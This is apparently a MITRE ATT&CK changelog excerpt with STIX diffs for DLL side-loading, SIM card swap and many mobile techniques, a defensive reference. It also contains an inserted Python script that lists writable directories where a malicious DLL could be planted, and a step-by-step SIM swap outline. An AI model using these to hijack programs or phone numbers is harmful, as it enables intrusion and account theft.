Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)
This object has been revoked by [T1574.001] DLL
Description for [T1574.001] DLL: Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42)
Specific ways DLLs are abused by adversaries include:
### DLL Sideloading
Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s).
Side-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.
Adversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl)
### DLL Search Order Hijacking
Adversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42)
### DLL Redirection
Adversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly)
### Phantom DLL Hijacking
Adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DLL Hijacking)(Citation: Hijack DLLs CrowdStrike)
### DLL Substitution
Adversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.(Citation: Wietze Beukema DLL Hijacking)
Programs that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses.
Remote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: dll pre load owasp)(Citation: microsoft remote preloading)
If a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation.
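The search-order, phantom and side-loading variants above all reduce to one question: which directories does the loader probe before it reaches the legitimate copy of a DLL, and can the adversary write to any of them? The following Python is an added example, not part of the ATT&CK changelog or of any technique's own content. It models the documented default search order (application directory, System32, the 16-bit System directory, the Windows directory, the current directory, then PATH, with the current directory promoted to second place when SafeDllSearchMode is disabled) and reports where a same-named DLL could be planted. The directory layout, file list and set of user-writable directories are constructed for illustration; KnownDLLs, already-loaded modules, manifests and `.local` redirection are deliberately not modelled.

```python
from pathlib import PureWindowsPath

# Fixed system locations in the default search order (assumed standard install).
WINDOWS_DIR = r"C:\Windows"
SYSTEM32_DIR = r"C:\Windows\System32"
SYSTEM16_DIR = r"C:\Windows\System"   # legacy 16-bit System directory

# Constructed scenario (not real telemetry): a vendor app, the user's shell
# location, one PATH entry, the files that exist, and the user-writable dirs.
APP_DIR = r"C:\Program Files\Vendor\App"
CWD = r"C:\Users\alice\Downloads"
PATH_DIRS = [r"C:\Users\alice\Tools"]
EXISTING = {
    r"C:\Program Files\Vendor\App\app.exe",
    r"C:\Windows\System32\version.dll",
}
WRITABLE = {CWD, r"C:\Users\alice\Tools"}


def _join(directory: str, name: str) -> str:
    return str(PureWindowsPath(directory) / name)


def _key(path: str) -> str:
    # Windows paths are case-insensitive; normalise before comparing.
    return str(PureWindowsPath(path)).lower()


def search_order(app_dir, cwd, path_dirs, safe_search=True):
    """Directories the loader probes, in order, for a DLL named without a path.

    Default order: application directory, System32, the 16-bit System
    directory, the Windows directory, the current directory, then PATH.
    With SafeDllSearchMode disabled the current directory moves to second.
    KnownDLLs, already-loaded modules, manifests and .local redirection
    short-circuit this search and are deliberately not modelled.
    """
    if safe_search:
        return [app_dir, SYSTEM32_DIR, SYSTEM16_DIR, WINDOWS_DIR, cwd, *path_dirs]
    return [app_dir, cwd, SYSTEM32_DIR, SYSTEM16_DIR, WINDOWS_DIR, *path_dirs]


def resolve(dll, order, existing):
    """First path in `order` where `dll` exists, or None for a phantom reference."""
    present = {_key(p) for p in existing}
    for directory in order:
        candidate = _join(directory, dll)
        if _key(candidate) in present:
            return candidate
    return None


def hijack_opportunities(dll, order, existing, writable):
    """Writable directories probed before the legitimate copy (all of them if phantom).

    Planting `dll` at any returned path makes the loader pick it over the real
    module; an empty list with a legitimate hit means the search order alone
    gives no foothold for this DLL.
    """
    legit = resolve(dll, order, existing)
    legit_dir = _key(str(PureWindowsPath(legit).parent)) if legit else None
    writable_keys = {_key(d) for d in writable}
    plant_here = []
    for directory in order:
        if _key(directory) == legit_dir:
            break  # everything after this loses to the legitimate copy
        if _key(directory) in writable_keys:
            plant_here.append(_join(directory, dll))
    return {"legitimate": legit, "phantom": legit is None, "plant_here": plant_here}


if __name__ == "__main__":
    for dll, app_dir, safe in [
        ("version.dll", APP_DIR, True),   # app in Program Files, safe search
        ("version.dll", APP_DIR, False),  # same app, SafeDllSearchMode disabled
        ("version.dll", CWD, True),       # signed app copied to Downloads: side-loading
        ("missing.dll", APP_DIR, True),   # phantom reference: no legitimate copy
    ]:
        order = search_order(app_dir, CWD, PATH_DIRS, safe_search=safe)
        print(dll, app_dir, safe, hijack_opportunities(dll, order, EXISTING, WRITABLE))
```

The four scenarios in the `__main__` block map onto the variants in the description: with the application in Program Files and safe search enabled, `version.dll` yields no writable directory ahead of System32; disabling SafeDllSearchMode exposes the current directory; copying the signed application into a user-writable folder (side-loading) makes the application directory itself the planting location; and a phantom reference turns every writable directory in the order into a candidate, with the first one winning.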
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_data_sources | ['File: File Modification', 'Process: Process Creation', 'Module: Module Load', 'File: File Creation'] | |
x_mitre_defense_bypassed | ['Anti-virus', 'Application Control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:47.241000+00:00 | 2025-04-15 19:59:17.126000+00:00 |
description | Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) | Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) |
revoked | False | True |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 2.0 | 2.1 |
mobile-attack
New Techniques
[T1670] Virtualization Solution
Current version: 1.0
Description:
Adversaries may carry out malicious operations using virtualization solutions to escape from Android sandboxes and to avoid detection. Android uses sandboxes to separate resources and code execution between applications and the operating system.(Citation: Android Application Sandbox) There are a few virtualization solutions available on Android, such as the Android Virtualization Framework (AVF).(Citation: Android AVF Overview)
Through virtualization solutions, adversaries may execute malicious operations without user knowledge. For example, adversaries may mimic a legitimate banking application’s functionalities in a virtual environment, thanks to the virtualization solution, while malicious code captures credentials.
Major Version Changes
[T1451] SIM Card Swap
Current version: 2.0
Version changed from: 1.2 → 2.0
Old description: An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account.(Citation: NYGov-Simswap)(Citation: Motherboard-Simswap2) The adversary could then obtain SMS messages or hijack phone calls intended for someone else.(Citation: Betanews-Simswap) One use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account.(Citation: Guardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap)
New description: Adversaries may gain access to mobile devices through transfers or swaps from victims’ phone numbers to adversary-controlled SIM cards and mobile devices.(Citation: ATT SIM Swap Scams)(Citation: Verizon SIM Swapping) The typical process is as follows: 1. Adversaries will first gather information about victims through [Phishing](https://attack.mitre.org/techniques/T1660), social engineering, data breaches, or other avenues. 2. Adversaries will then impersonate victims as they contact mobile carriers to request for the SIM swaps. For example, adversaries would provide victims’ name and address to mobile carriers; once authenticated, adversaries would request for victims’ phone numbers to be transferred to adversary-controlled SIM cards. 3. Once completed, victims will lose mobile data, such as text messages and phone calls, on their mobile devices. In turn, adversaries will receive mobile data that was intended for the victims. Adversaries may use the intercepted SMS messages to log into online accounts that use SMS-based authentication. Specifically, adversaries may use SMS-based authentication to log into banking and/or cryptocurrency accounts, then transfer funds to adversary-controlled wallets.
New Mitigations:
- M1011: User Guidance
- M1012: Enterprise Policy
New Detections:
- DS0042: User Interface (System Notifications)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-06 15:53:54.872000+00:00 | 2025-02-12 16:26:38.632000+00:00 |
description | An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account.(Citation: NYGov-Simswap)(Citation: Motherboard-Simswap2) The adversary could then obtain SMS messages or hijack phone calls intended for someone else.(Citation: Betanews-Simswap)
One use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account.(Citation: Guardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap) | Adversaries may gain access to mobile devices through transfers or swaps from victims’ phone numbers to adversary-controlled SIM cards and mobile devices.(Citation: ATT SIM Swap Scams)(Citation: Verizon SIM Swapping)
The typical process is as follows:
1. Adversaries will first gather information about victims through [Phishing](https://attack.mitre.org/techniques/T1660), social engineering, data breaches, or other avenues.
2. Adversaries will then impersonate victims as they contact mobile carriers to request for the SIM swaps. For example, adversaries would provide victims’ name and address to mobile carriers; once authenticated, adversaries would request for victims’ phone numbers to be transferred to adversary-controlled SIM cards.
3. Once completed, victims will lose mobile data, such as text messages and phone calls, on their mobile devices. In turn, adversaries will receive mobile data that was intended for the victims.
Adversaries may use the intercepted SMS messages to log into online accounts that use SMS-based authentication. Specifically, adversaries may use SMS-based authentication to log into banking and/or cryptocurrency accounts, then transfer funds to adversary-controlled wallets. |
kill_chain_phases[0]['phase_name'] | network-effects | initial-access |
external_references[1]['source_name'] | Betanews-Simswap | Verizon SIM Swapping |
external_references[1]['description'] | Alex Cambell. (2016, February 12). Everything you need to know about SIM swap scams. Retrieved December 12, 2016. | Verizon. (n.d.). SIM Swapping. Retrieved January 27, 2025. |
external_references[1]['url'] | http://betanews.com/2016/02/12/everything-you-need-to-know-about-sim-swap-scams/ | https://www.verizon.com/about/account-security/sim-swapping |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_deprecated | True | False |
x_mitre_version | 1.2 | 2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'ATT SIM Swap Scams', 'description': 'AT&T. (n.d.). UPDATE: Secure Your Number to Reduce SIM Swap Scams. Retrieved January 27, 2025.', 'url': 'https://www.research.att.com/sites/cyberaware/ni/blog/sim_swap.html'} |
x_mitre_contributors | | Jennifer Kim Roman |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
external_references | {'source_name': 'Krebs-SimSwap', 'description': 'Brian Krebs. (2018, May 18). T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account. Retrieved November 8, 2018.', 'url': 'https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/'} | |
external_references | {'source_name': 'TechCrunch-SimSwap', 'description': 'John Biggs. (2017, August 23). I was hacked. Retrieved November 8, 2018.', 'url': 'https://techcrunch.com/2017/08/23/i-was-hacked/'} | |
external_references | {'source_name': 'Motherboard-Simswap2', 'description': 'Lorenzo Franceschi-Bicchierai. (2018, August 3). How Criminals Recruit Telecom Employees to Help Them Hijack SIM Cards. Retrieved August 11, 2018.', 'url': 'https://motherboard.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-employees-sim-swapping-port-out-scam'} | |
external_references | {'source_name': 'Motherboard-Simswap1', 'description': 'Lorenzo Franceschi-Bicchierai. (2018, July 17). The SIM Hijackers. Retrieved August 11, 2018.', 'url': 'https://motherboard.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin'} | |
external_references | {'source_name': 'Guardian-Simswap', 'description': 'Miles Brignall. (2016, April 16). Sim-swap fraud claims another mobile banking victim. Retrieved December 12, 2016.', 'url': 'https://www.theguardian.com/money/2016/apr/16/sim-swap-fraud-mobile-banking-fraudsters'} | |
external_references | {'source_name': 'NYGov-Simswap', 'description': 'New York Department of State. (2016, February 12). AT&T SIM-Card Switch Scam. Retrieved August 23, 2016.', 'url': 'http://www.dos.ny.gov/consumerprotection/scams/att-sim.html'} | |
Minor Version Changes
[T1664] Exploitation for Initial Access
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description: Adversaries may exploit software vulnerabilities to gain initial access to a mobile device. This can be accomplished in a variety of ways. Vulnerabilities may be present in applications, services, the underlying operating system, or in the kernel itself. Several well-known mobile device exploits exist, including FORCEDENTRY, StageFright, and BlueBorne. Further, some exploits may be possible to exploit without any user interaction (zero-click), making them particularly dangerous. Mobile operating system vendors are typically very quick to patch such critical bugs, ensuring only a small window where they can be exploited.
New description: Adversaries may exploit software vulnerabilities to gain initial access to a mobile device. This can be accomplished in a variety of ways. Vulnerabilities may be present in the applications, the services, the underlying operating system, or the kernel itself. Several well-known mobile device exploits exist, including FORCEDENTRY, StageFright, and BlueBorne. Furthermore, some exploits may be possible to exploit without any user interaction (i.e. zero-click exploits, see [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1658)), making them particularly dangerous. Mobile operating system vendors are typically very quick to patch such critical bugs, ensuring only a small window where they can be exploited.
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-12-05 22:14:54.813000+00:00 | 2025-02-27 22:56:19.681000+00:00 |
description | Adversaries may exploit software vulnerabilities to gain initial access to a mobile device.
This can be accomplished in a variety of ways. Vulnerabilities may be present in applications, services, the underlying operating system, or in the kernel itself. Several well-known mobile device exploits exist, including FORCEDENTRY, StageFright, and BlueBorne. Further, some exploits may be possible to exploit without any user interaction (zero-click), making them particularly dangerous. Mobile operating system vendors are typically very quick to patch such critical bugs, ensuring only a small window where they can be exploited. | Adversaries may exploit software vulnerabilities to gain initial access to a mobile device.
This can be accomplished in a variety of ways. Vulnerabilities may be present in the applications, the services, the underlying operating system, or the kernel itself. Several well-known mobile device exploits exist, including FORCEDENTRY, StageFright, and BlueBorne. Furthermore, some exploits may be possible to exploit without any user interaction (i.e. zero-click exploits, see [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1658)), making them particularly dangerous. Mobile operating system vendors are typically very quick to patch such critical bugs, ensuring only a small window where they can be exploited. |
x_mitre_version | 1.0 | 1.1 |
Patches
[T1626] Abuse Elevation Control Mechanism
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-15 16:23:59.281000+00:00 | 2025-04-16 21:21:43.814000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1517] Access Notifications
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-15 16:26:05.050000+00:00 | 2025-04-16 21:21:48.448000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1640] Account Access Removal
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-15 16:34:51.917000+00:00 | 2025-04-16 21:21:57.695000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1437] Application Layer Protocol
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-19 20:03:51.831000+00:00 | 2025-04-16 21:21:50.479000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1532] Archive Collected Data
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-01 15:01:02.140000+00:00 | 2025-04-16 21:21:57.990000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1521.002] Encrypted Channel: Asymmetric Cryptography
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-05 20:16:21.324000+00:00 | 2025-04-16 21:21:44.987000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1429] Audio Capture
Current version: 3.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-16 13:31:29.924000+00:00 | 2025-04-16 21:21:49.937000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1481.002] Web Service: Bidirectional Communication
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 16:34:55.968000+00:00 | 2025-04-16 21:21:51.825000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1398] Boot or Logon Initialization Scripts
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-16 18:26:46.043000+00:00 | 2025-04-16 21:21:48.836000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1624.001] Event Triggered Execution: Broadcast Receivers
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-16 18:27:42.752000+00:00 | 2025-04-16 21:21:48.286000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1636.001] Protected User Data: Calendar Entries
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-16 18:28:28.234000+00:00 | 2025-04-16 21:21:53.420000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1616] Call Control
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-10 21:57:52.009000+00:00 | 2025-04-16 21:21:47.962000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1636.002] Protected User Data: Call Log
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-16 18:32:30.150000+00:00 | 2025-04-16 21:21:45.503000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1632.001] Subvert Trust Controls: Code Signing Policy Modification
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-16 18:37:55.822000+00:00 | 2025-04-16 21:21:59.231000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1623] Command and Scripting Interpreter
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-07 22:15:34.693000+00:00 | 2025-04-16 21:21:46.879000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1577] Compromise Application Executable
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:21:56.351000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1645] Compromise Client Software Binary
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 15:20:11.752000+00:00 | 2025-04-16 21:21:49.029000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1474.002] Supply Chain Compromise: Compromise Hardware Supply Chain
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 15:21:12.603000+00:00 | 2025-04-16 21:21:54.553000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1474.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 15:28:54.940000+00:00 | 2024-11-17 13:32:52.030000+00:00 |
external_references[1]['description'] | M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved December 22, 2016. | M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf | https://dl.acm.org/doi/10.1145/2185448.2185464 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1474.003] Supply Chain Compromise: Compromise Software Supply Chain
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 15:32:37.109000+00:00 | 2025-04-16 21:21:52.139000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1636.003] Protected User Data: Contact List
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 15:40:11.937000+00:00 | 2025-04-16 21:21:57.342000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1634] Credentials from Password Store
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-08 19:19:37.927000+00:00 | 2025-04-16 21:21:55.358000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1471] Data Encrypted for Impact
Current version: 3.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 15:55:09.397000+00:00 | 2025-04-16 21:21:57.034000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1641] Data Manipulation
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 15:55:32.497000+00:00 | 2025-04-16 21:21:54.742000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1533] Data from Local System
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-01 16:53:27.576000+00:00 | 2025-04-16 21:21:57.505000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1481.001] Web Service: Dead Drop Resolver
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 16:33:56.861000+00:00 | 2025-04-16 21:21:52.296000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1626.001] Abuse Elevation Control Mechanism: Device Administrator Permissions
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 15:56:34.537000+00:00 | 2025-04-16 21:21:52.648000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1629.002] Impair Defenses: Device Lockout
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:39:10.201000+00:00 | 2025-04-16 21:21:53.782000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1629.003] Impair Defenses: Disable or Modify Tools
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:40:12.912000+00:00 | 2025-04-16 21:21:47.026000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1630.003] Indicator Removal on Host: Disguise Root/Jailbreak Indicators
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:18:29.556000+00:00 | 2025-04-16 21:21:53.262000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1637.001] Dynamic Resolution: Domain Generation Algorithms
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 16:19:54.832000+00:00 | 2025-04-16 21:21:59.384000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1407] Download New Code at Runtime
Current version: 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-08 16:23:41.271000+00:00 | 2025-04-16 21:21:50.660000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1456] Drive-By Compromise
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-07 17:12:07.620000+00:00 | 2025-04-16 21:21:59.531000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1637] Dynamic Resolution
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 16:19:34.225000+00:00 | 2025-04-16 21:21:47.329000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1521] Encrypted Channel
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-05 20:11:35.852000+00:00 | 2025-04-16 21:21:58.602000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1642] Endpoint Denial of Service
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:41:56.376000+00:00 | 2025-04-16 21:21:58.297000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1624] Event Triggered Execution
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:43:46.177000+00:00 | 2025-04-16 21:21:56.521000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1627] Execution Guardrails
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:44:26.317000+00:00 | 2024-11-17 18:31:54.804000+00:00 |
external_references[1]['description'] | Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019. | Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved November 17, 2024. |
external_references[1]['url'] | https://securitywithoutborders.org/blog/2019/03/29/exodus.html | https://web.archive.org/web/20200314194610/https://securitywithoutborders.org/blog/2019/03/29/exodus.html |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1639] Exfiltration Over Alternative Protocol
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 16:39:22.707000+00:00 | 2025-04-16 21:21:48.656000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1646] Exfiltration Over C2 Channel
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 16:41:52+00:00 | 2025-04-16 21:21:47.650000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1639.001] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 16:40:40.166000+00:00 | 2025-04-16 21:21:48.130000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1404] Exploitation for Privilege Escalation
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-08 19:20:13.836000+00:00 | 2025-04-16 21:21:47.809000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1428] Exploitation of Remote Services
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:51:07.651000+00:00 | 2025-04-16 21:21:46.157000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1630.002] Indicator Removal on Host: File Deletion
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:52:24.758000+00:00 | 2025-04-16 21:21:53.593000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1420] File and Directory Discovery
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:53:35.087000+00:00 | 2025-04-16 21:21:55.729000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1541] Foreground Persistence
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:54:25.564000+00:00 | 2025-04-16 21:21:49.743000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
